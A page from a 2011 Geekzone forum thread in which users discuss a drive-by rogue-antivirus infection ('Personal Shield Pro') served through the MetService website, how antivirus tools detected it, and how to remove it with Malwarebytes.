Is Trade Me spreading virus again? (updated: metservice)

Forums › Desktop computing › Is Trade Me spreading virus again? (updated: metservice)

1 | 2 | 3 | 4 | 5 | 6 | 7 | 8

32 posts

Geek

Trusted

#508049 17-Aug-2011 16:14

and nzherald:
http://www.nzherald.co.nz/nz/news/article.cfm?c_id=1&objectid=10745663

freitasm

BDFL - Memuneh
80662 posts

Uber Geek
+1 received by user: 41090

Administrator

ID Verified

Trusted

Geekzone

Lifetime subscriber

#508053 17-Aug-2011 16:16

DonGould: So far I've read that AVG and MSE aren't stopping it.

Try Norton Power Eraser and let us know: http://security.symantec.com/nbrt/overview.aspx?lcid=1033

Referral links: Quic Broadband (free setup code: R587125ERQ6VE) | Samsung | AliExpress | Wise | Sharesies

Support Geekzone by subscribing (browse ads-free), or making a one-off or recurring donation through PressPatron.

DonGould

3892 posts

Uber Geek
+1 received by user: 164

#508070 17-Aug-2011 16:31

graciem: and nzherald:
http://www.nzherald.co.nz/nz/news/article.cfm?c_id=1&objectid=10745663

http://www.nzherald.co.nz/nz/news/article.cfm?c_id=1&objectid=10745663

With the link fixed :) it opened on to gz for me.

Promote New Zealand - Get yourself a .kiwi.nz domain name!!!

Check out mine - i.am.a.can.do.kiwi.nz - don@i.am.a.can.do.kiwi.nz

cws82us

788 posts

Ultimate Geek
+1 received by user: 23

#508090 17-Aug-2011 16:45

Maybe it's the govt using it to spy on us. Like they trying to do.

join Quic and get free sign up when you click my link https://account.quic.nz/refer/250676

kiwitrc

4123 posts

Uber Geek
+1 received by user: 833
Inactive user

#508099 17-Aug-2011 16:59

cws82us: Maybe it's the govt using it to spy on us. Like they trying to do.

Bit cold for tin hats aint it?

deltadelta

21 posts

Geek
+1 received by user: 7

#508128 17-Aug-2011 17:45

I've acquired a sample that Windows Defender is calling "Rogue:Win32/Winwebsec" - it calls itself "Personal Shield Pro" in the popups that it creates.

http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?ame=Rogue%3aWin32%2fWinwebsec&threatid=133077

Geekzone support

Support Geekzone with one-off or recurring donations Donate via PressPatron.

freitasm

BDFL - Memuneh
80662 posts

Uber Geek
+1 received by user: 41090

Administrator

ID Verified

Trusted

Geekzone

Lifetime subscriber

#508133 17-Aug-2011 17:50

Interesting that was published in 2010, and Microsoft Security Essentials failed to get it...

Referral links: Quic Broadband (free setup code: R587125ERQ6VE) | Samsung | AliExpress | Wise | Sharesies

Support Geekzone by subscribing (browse ads-free), or making a one-off or recurring donation through PressPatron.

deltadelta

21 posts

Geek
+1 received by user: 7

#508164 17-Aug-2011 18:34

I've just re-scanned it with Microsoft Security Essentials, which did detect it, also as http://www.microsoft.com/security/portal/Threat/Encyclopedia/Entry.aspx?name=Rogue%3aWin32%2fWinwebsec&threatid=2147616725

DonGould

3892 posts

Uber Geek
+1 received by user: 164

#508171 17-Aug-2011 18:48

kiwitrc:
cws82us: Maybe it's the govt using it to spy on us. Like they trying to do.

Bit cold for tin hats aint it?

* Does the virus have a back door?
* Was the back door put in the OS by someone's government for someones government?
* Is the virus there to highlight the government back door to make the OS provider close the door?
* Is the virus an attempt to get into your computer, or an attempt to draw attention to the open door and make sure you actually do something to close it?
* Is the <Insert Government of choice> spying on me or are they attempting to prevent <Insert another government of choice> from spying on me?

A good friend always tells me the 13th floor has the "antivirus developers" and the 14th floor of the same building has the "virus developers" and it's nothing but a scam to make us spend money on software...

* Or are the hackers being a bit busy because they have to much time on their hands, so infecting a bunch of their customers will give them something else to do for a week or so...

* Or are the sales in <Insert International Cable provider of your choice> down and needing more network traffic to justify <Insert next big upgrade/project of your choice>

* Or ..... pffft... you're only paranoid if they're not watching you....

Personally security always scares the crap out of me... is mine good enough? If it is good enough and no one can look in, then do they start to wonder what I'm hiding in here? So should I have the doors and windows open so people can see I'm not hiding anything I shouldn't be... but then does that mean someone could put something here that I shouldn't have... and am I compromising my customers and putting my self at risk of breaching privacy rules for not making enough effort to secure data? Should I use PGP on my email, for example, but then do others have the perception they can communicate things to me they wouldn't if I just have plan text email? Do I want those messages?

We could play the tin foil hat game all day... do we sleep better for it?

Promote New Zealand - Get yourself a .kiwi.nz domain name!!!

Check out mine - i.am.a.can.do.kiwi.nz - don@i.am.a.can.do.kiwi.nz

DonGould

3892 posts

Uber Geek
+1 received by user: 164

#508182 17-Aug-2011 19:18

ps - on reading my last post to my wife, she tells me I've got it all wrong...

...it's not governments at all, it's drug companies who make paranoia medicine.

Promote New Zealand - Get yourself a .kiwi.nz domain name!!!

Check out mine - i.am.a.can.do.kiwi.nz - don@i.am.a.can.do.kiwi.nz

freitasm

BDFL - Memuneh
80662 posts

Uber Geek
+1 received by user: 41090

Administrator

ID Verified

Trusted

Geekzone

Lifetime subscriber

#508360 18-Aug-2011 09:10

Back on topic folks... I want to write instructions on removing this infection. Does anyone has a software recommendation that actually worked?

Referral links: Quic Broadband (free setup code: R587125ERQ6VE) | Samsung | AliExpress | Wise | Sharesies

Support Geekzone by subscribing (browse ads-free), or making a one-off or recurring donation through PressPatron.

Dyson

Shop now for Dyson appliances (affiliate link).

deltadelta

21 posts

Geek
+1 received by user: 7

#508362 18-Aug-2011 09:24

Malwarebytes Free, installed and updated in Safe Mode with Networking on Windows XP SP3. Run a Full Scan and delete the found items (in my case there was only 1 found, and removing it did the trick).

Consider though that the site may have served up different malware variants to different people (perhaps based on user agent string or JS version?), or that some people will also have other infections in addition to this one that malwarebytes might find and be unable to fix.

wjw

174 posts

Master Geek
+1 received by user: 5

#508364 18-Aug-2011 09:29

freitasm: Back on topic folks... I want to write instructions on removing this infection. Does anyone has a software recommendation that actually worked?

I used this:

MalwareBytes Anti-malware

As linked from here:

wjw: From another website I'm on:

http://deletemalware.blogspot.com/2011/07/how-to-remove-personal-shield-pro.html

Two people so far have said this removal process works

freitasm

BDFL - Memuneh
80662 posts

Uber Geek
+1 received by user: 41090

Administrator

ID Verified

Trusted

Geekzone

Lifetime subscriber

#508379 18-Aug-2011 10:05

Folks, on request of MetService I have created this blog post: http://www.geekzone.co.nz/freitasm/7776

Could you please check that the information is correct or closer to what we know, and if there's anything else we can add or change please send me a PM so I can update it?

I guess there will be quite a few readers on that so it would be good to get it as easier as possible for people to follow.

Thanks!

Referral links: Quic Broadband (free setup code: R587125ERQ6VE) | Samsung | AliExpress | Wise | Sharesies

Support Geekzone by subscribing (browse ads-free), or making a one-off or recurring donation through PressPatron.

freitasm

BDFL - Memuneh
80662 posts

Uber Geek
+1 received by user: 41090

Administrator

ID Verified

Trusted

Geekzone

Lifetime subscriber

#508397 18-Aug-2011 10:24

Just saw the comments on NBR. People complaining about online ads, etc.

This was a drive-by download. No need to click ads
The problem was probably a SQL Injection in their ad serving database. This means it could affect ANY database driven website. They've done through the ad server because they used a known vulnerability and as MetService admitted a new version has been deployed, fixing it. But still, it's not about the ads themselves (unlike the Trade Me case few months back).
It seems the problem was not the browser. The problem was with a Java exploit being used. For example I am using Internet Explorer and visited the MetService many times this week but did not have problems because I don't have Java installed on my computer.

Referral links: Quic Broadband (free setup code: R587125ERQ6VE) | Samsung | AliExpress | Wise | Sharesies

Support Geekzone by subscribing (browse ads-free), or making a one-off or recurring donation through PressPatron.

1 | 2 | 3 | 4 | 5 | 6 | 7 | 8